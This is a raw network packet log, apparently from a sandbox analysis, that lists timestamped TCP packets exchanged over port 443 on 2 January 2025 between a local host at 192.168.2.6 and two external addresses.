Jan 2, 2025 12:14:14.477123022 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.477133036 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.482336998 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.482397079 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.482491016 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.482554913 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.485301971 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.485354900 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.485474110 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.485533953 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.486598969 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.486673117 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.486685038 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.486738920 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.490210056 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.490272999 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.490355968 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.490411043 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.492021084 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.492084026 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.492353916 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.492402077 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.494775057 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.494832993 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.494930029 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.494985104 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.497348070 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.497401953 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.497508049 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.497575045 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.500097036 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.500158072 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.500164986 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.500211000 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.707335949 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.707438946 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849526882 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849554062 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849565983 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849637985 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849643946 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849662066 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849730015 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849735022 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849751949 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849767923 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849771976 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849802971 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849806070 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849837065 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849863052 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849874973 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.849899054 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849926949 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.849973917 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.850039959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.850045919 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.850096941 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.850104094 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:14.850140095 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.850157022 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:14.850188017 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.055344105 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.055679083 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.267333031 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.267425060 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.679341078 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.679645061 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.828636885 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.828666925 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828681946 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828691006 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828747988 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.828754902 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828772068 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828819990 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.828824043 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828833103 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828876972 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.828881025 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828896046 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828938961 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.828958035 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.828988075 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.829001904 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.829008102 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.829077959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.829190016 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:15.829195023 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:15.829245090 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.015693903 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.015724897 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.015794039 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.015814066 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.016012907 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.016022921 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.016033888 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.016129017 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.016215086 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.016222000 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.016269922 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.016293049 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.223246098 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.223284006 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.223339081 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.223647118 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.250777960 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.250808001 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.250871897 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.250889063 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.251275063 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.251286030 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.251391888 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.251400948 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.251419067 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.251477003 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.435815096 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.435842037 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.435888052 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.436077118 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.498176098 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.498214960 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.498285055 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.498406887 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.498436928 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.498449087 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.498536110 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.498642921 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.498648882 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.498733997 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.703344107 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.703407049 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.711730957 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.711740017 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.711750984 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.711817026 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.711822987 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.711833000 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.711926937 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.785279989 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.785300970 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.785342932 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.785346985 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.785522938 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.785530090 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.785547972 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.785563946 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.785592079 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.785684109 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.785722017 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:16.995337009 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:16.997792959 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.033524990 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.033544064 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.033586025 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.033731937 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.121830940 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.121881962 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.121908903 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.121926069 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.122139931 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.122148991 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.122216940 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.122222900 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.122349977 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.331347942 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.331429958 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.422405958 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.422455072 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.422492981 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.422667980 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.525489092 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.525521040 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.525564909 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.525583982 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.525777102 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.525785923 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.525837898 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.525844097 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.525917053 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.525983095 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:17.735342979 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:17.735618114 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.179339886 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.179428101 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.207542896 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.207576036 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.207591057 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.207653999 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.207659006 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.207668066 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.207676888 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.207712889 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.207756996 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.313487053 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.313549995 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.313576937 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.313780069 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.313791037 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.313802004 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.313823938 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.313990116 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.314065933 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.519340992 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.519399881 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.658608913 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.658627987 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.658644915 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.658724070 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.658792973 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.776463985 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:18.776493073 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:18.776578903 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:19.108977079 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:19.218755960 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:19.781567097 CET	49984	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:19.781625986 CET	443	49984	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:20.003417969 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:20.003457069 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:20.003701925 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:20.003978968 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:20.003993034 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.239295006 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.239387989 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.239806890 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.239816904 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.239989042 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.239995003 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.557233095 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.557277918 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.557398081 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.557430029 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.557450056 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.557482958 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.557496071 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.558300018 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.558370113 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.559813023 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.559880018 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.644560099 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.644604921 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.644726038 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.644754887 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.644799948 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.644809008 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.645334959 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.645406008 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.645415068 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.645451069 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.645461082 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.645507097 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.645625114 CET	49987	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.645647049 CET	443	49987	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.660979986 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.661026955 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:21.661108971 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.661287069 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:21.661302090 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.003177881 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.003293037 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.003732920 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.003746033 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.003907919 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.003914118 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.321794987 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.321820021 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.321894884 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.321923971 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.321935892 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.321968079 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.322391033 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.322441101 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.322448015 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.322484970 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:14:23.322487116 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.322529078 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.322738886 CET	49988	443	192.168.2.6	39.103.20.59
Jan 2, 2025 12:14:23.322753906 CET	443	49988	39.103.20.59	192.168.2.6
Jan 2, 2025 12:15:14.100096941 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:14.100152969 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:14.100230932 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:14.108361006 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:14.108377934 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.481267929 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.481365919 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.482090950 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.482145071 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.548439026 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.548466921 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.548904896 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.550054073 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.552987099 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.599335909 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.917705059 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.917733908 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.917793036 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.917821884 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.917834044 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.917916059 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.918160915 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.918219090 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.920042992 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.920098066 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:15.924757957 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:15.924823046 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.008821011 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.008874893 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.008904934 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.008936882 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.008946896 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.009015083 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.009037971 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.009398937 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.009470940 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.010234118 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.010308981 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.010314941 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.010334015 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:16.010355949 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.010391951 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.010437012 CET	49991	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:16.010448933 CET	443	49991	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:17.291336060 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:17.291389942 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:17.291666031 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:17.291950941 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:17.291964054 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:18.647653103 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:18.647835970 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:18.648565054 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:18.648585081 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:18.648794889 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:18.648799896 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:19.018516064 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:19.018594027 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:19.018665075 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:19.018699884 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:19.019572020 CET	49992	443	192.168.2.6	118.178.60.9
Jan 2, 2025 12:15:19.019602060 CET	443	49992	118.178.60.9	192.168.2.6
Jan 2, 2025 12:15:19.030009985 CET	49993	443	192.168.2.6	118.178.60.9
